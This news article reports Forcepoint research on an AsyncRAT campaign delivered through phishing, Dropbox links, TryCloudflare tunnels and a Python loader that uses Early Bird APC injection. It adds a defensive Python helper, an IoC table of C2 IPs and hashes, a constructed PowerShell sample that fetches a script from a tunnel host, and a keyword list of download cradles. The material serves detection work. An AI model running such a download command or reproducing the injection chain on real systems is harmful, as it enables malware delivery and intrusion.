AsyncRAT Campaign Abuses TryCloudflare Tunnels and Python Scripts for Malware Delivery

In Cybersecurity News. Original news source: cybersecuritynews.com, by Blog Writer.


AsyncRAT is back in the headlines, and the attackers behind it have found a clever way to hide in plain sight.

Instead of relying on suspicious servers, they use Dropbox links and TryCloudflare tunnels, both trusted services that most security tools rarely block.

The result is a campaign that slips past everyday defenses while quietly handing control of infected computers to attackers.

The trojan itself is nothing new. AsyncRAT has been used for years to spy on victims, steal data, and run remote commands without being noticed.

What makes this wave notable is the delivery method, which leans on legitimate cloud infrastructure and a hidden Python package to install the final payload.

Researchers from Forcepoint recently identified this AsyncRAT campaign, noting that it closely resembles an earlier attack the company analyzed back in August.

The team said the reuse of TryCloudflare confirms predictions made in its 2025 Future Insights report, which warned that attackers would increasingly abuse legitimate infrastructure to stay under the radar.

The infection starts with something almost everyone has seen before: a phishing email carrying an invoice-themed message.

Clicking the embedded Dropbox link triggers a chain of downloads that eventually installs AsyncRAT while showing the victim a convincing fake PDF invoice to keep suspicion low.

Forcepoint said in a report shared with Cyber Security News (CSN) that the campaign shows how easily trusted platforms can be turned into delivery tools for serious cyber threats.

AsyncRAT Campaign Abuses TryCloudflare Tunnels and Python Scripts

The email lure hides a Dropbox URL behind a German-language button offering to download an invoice. Clicking it downloads a ZIP file containing an Internet shortcut, and opening that shortcut connects to a TryCloudflare subdomain.

AsyncRAT attack chain (Source – Forcepoint)

That subdomain hosts an LNK file, which uses PowerShell to fetch a JavaScript file from the same tunnel.

.LNK file with path to JavaScript file (Source – Forcepoint)

The JavaScript, once deobfuscated, quietly pulls down a batch file from the same infrastructure.

Fake PDF file used for distraction (Source – Forcepoint)

This batch file is heavily obfuscated and does the real heavy lifting. It opens the fake invoice PDF as a decoy while downloading a second ZIP file that carries a Python package. It also checks whether Python is installed, running a bundled interpreter if not.

Actual malicious files (Source – Forcepoint)

Inside that Python package, most files are harmless setup components. Only a single script named load.py, along with five accompanying binary files, actually carries out the attack.

Python Loader And Final Payload

Once triggered, load.py calls on ctypes, a Python library that talks directly to Windows system functions. It uses this access to allocate memory, create threads, and copy shellcode into place, all classic building blocks of process injection.

The technique used here is Early Bird APC Queue injection. It plants code into a newly created process before that process starts running its main thread, making it harder for antivirus and endpoint tools to catch.

One binary injects VenomRAT into the legitimate notepad.exe process, another injects XWorm, and the remaining files inject AsyncRAT shellcode into explorer.exe. All variants reach out to the same command-and-control servers over different ports.

Forcepoint noted its customers already have protection at several stages of this chain, including blocking the lure attachments, redirect URLs, dropper files, and call-home traffic to the command-and-control servers.

Its NGFW products also terminate LNK file transfers and suspicious PowerShell connections by default.

Treat unexpected invoice emails with caution, especially ones urging an urgent download, and avoid opening ZIP attachments or shortcut files from unknown senders. Keeping PowerShell logging enabled can also help catch this infection early.
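As an added example (not Forcepoint's code or anything from the report), the Python triage helper below covers the two hops a defender can check cheaply: it parses the Internet-shortcut-to-TryCloudflare hop from the Dropbox ZIP and scores PowerShell Script Block Logging (Event ID 4104) text for the download-cradle-plus-tunnel-host pattern of the LNK stage. The tunnel hostname and log text are constructed, and the cradle keyword list is a starting point rather than an exhaustive one.

```python
import re
from typing import Optional
from urllib.parse import urlparse

# Constructed samples (not from the Forcepoint report): a .url body like the
# one in the Dropbox ZIP, and PowerShell 4104 ScriptBlockText values.
SAMPLE_SHORTCUT = ("[InternetShortcut]\r\n"
                   "URL=https://constructed-tunnel-example.trycloudflare.com/DE/\r\n")
SAMPLE_BLOCKS = [
    # hidden PowerShell fetching a .js from the tunnel, as in the LNK stage
    'powershell -w hidden -c "iwr https://constructed-tunnel-example.trycloudflare.com/DE/x.js '
    '-OutFile $env:TEMP\\x.js"',
    # benign admin activity: no download cradle, no tunnel host
    "Get-ChildItem C:\\Windows\\Temp | Remove-Item -Force",
    # download cradle, but from a host that is not a quick tunnel
    "(New-Object Net.WebClient).DownloadFile('https://downloads.example.org/tool.zip','t.zip')",
]

TUNNEL_SUFFIXES = (".trycloudflare.com",)
SCRIPT_EXTS = (".js", ".bat", ".cmd", ".vbs", ".ps1", ".zip")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
CRADLE_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|Invoke-RestMethod|\birm\b|"
    r"Net\.WebClient|DownloadString|DownloadFile|Start-BitsTransfer", re.IGNORECASE)

def parse_url_shortcut(content: str) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section of a .url file."""
    in_section = False
    for raw in content.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[internetshortcut]"
        elif in_section and line.lower().startswith("url="):
            return line[4:].strip()
    return None

def tunnel_hosts(text: str) -> list:
    """Every URL host in text that sits under a quick-tunnel suffix."""
    hosts = [(urlparse(u).hostname or "").lower() for u in URL_RE.findall(text)]
    return [h for h in hosts if h.endswith(TUNNEL_SUFFIXES)]

def score_script_block(text: str) -> dict:
    """Flag a script block that pairs a download cradle with a tunnel host."""
    urls = URL_RE.findall(text)
    hosts = tunnel_hosts(text)
    cradle = CRADLE_RE.search(text) is not None
    payload = any(urlparse(u).path.lower().endswith(SCRIPT_EXTS) for u in urls)
    return {"tunnel_hosts": hosts, "cradle": cradle, "script_payload": payload,
            "suspicious": cradle and bool(hosts)}
```

Run `score_script_block` over each 4104 record's ScriptBlockText and alert on `suspicious`; the `cradle` and `script_payload` fields are kept separately so a cradle hitting a non-tunnel host can be triaged at lower priority instead of dropped.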

Forcepoint expects more campaigns like this going forward, since low-cost, disposable infrastructure makes it cheap for criminals to launch infostealers and remote access trojans while staying ahead of blocklists.

Indicators of Compromise (IoCs):

| Type | Indicator | Description |
|---|---|---|
| URL | hxxps[:]//inventory-card-thumbzilla-ip[.]trycloudflare[.]com/DE/ | Hosts the LNK file used in the attack chain |
| URL | hxxps[:]//mercy-synopsis-notify-motels[.]trycloudflare[.]com/ma[.]zip | Delivers the malicious Python package ZIP |
| URL | hxxp[:]//sufficiently-points-est-minimize[.]trycloudflare[.]com/ma[.]zip | Alternate host delivering the Python package ZIP |
| C2 IP | 62.60.190.141 | Command-and-control server, contacted over ports 3232 and 4056 |
| C2 IP | 62.60.190.196 | Secondary command-and-control server |
| File Hash (ZIP) | 55724b766dd1fe8bf9dd4cb7094b83b88d57d945 | Initial ZIP file downloaded from Dropbox |
| File Hash (URL) | 4483561a49791a7cd684258e9f1623fe7dfba772 | Internet shortcut file embedded with TryCloudflare link |
| File Hash (LNK) | 0aa1b8fba8d7bd19a0064edfdf86c027da253644 | LNK file that triggers PowerShell download |
| File Hash (JS) | 659ecdeb19b8e49be61fe41e8796d1215272b16e | JavaScript file linking to BAT file |
| File Hash (BAT) | cd61de9e4003ba568ae76f064935addb106a6d6d | Obfuscated batch file that downloads the Python package |
| File Hash (ZIP) | 0221ec304905a758d9b47d6a631622b7dcf3c1f5 | ma.zip file containing malicious Python components |
| File Hash (PY) | 4747ee49bdf31351c025049d8c3b7fef831be77c | load.py, the malicious Python loader script |
| File Hash (BIN) | 8ef36a4865f4a73a4e8fe4b90e5eff4a7feb3647 | Shellcode binary loaded by load.py |
| File Hash (BIN) | ae1dece09c2b627d8d3fe1c1f758db9ca6d5820c | Shellcode binary loaded by load.py |
| File Hash (BIN) | 8dc9071a46a019547c8355a155d9c3c3b154e7a2 | Shellcode binary loaded by load.py |
| File Hash (BIN) | 098c369c904e8c328df40062190aff009e02d369 | Shellcode binary loaded by load.py |
| File Hash (BIN) | ff6186eef1c17a2668c6013d38fecead4f507556 | Shellcode binary loaded by load.py |

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
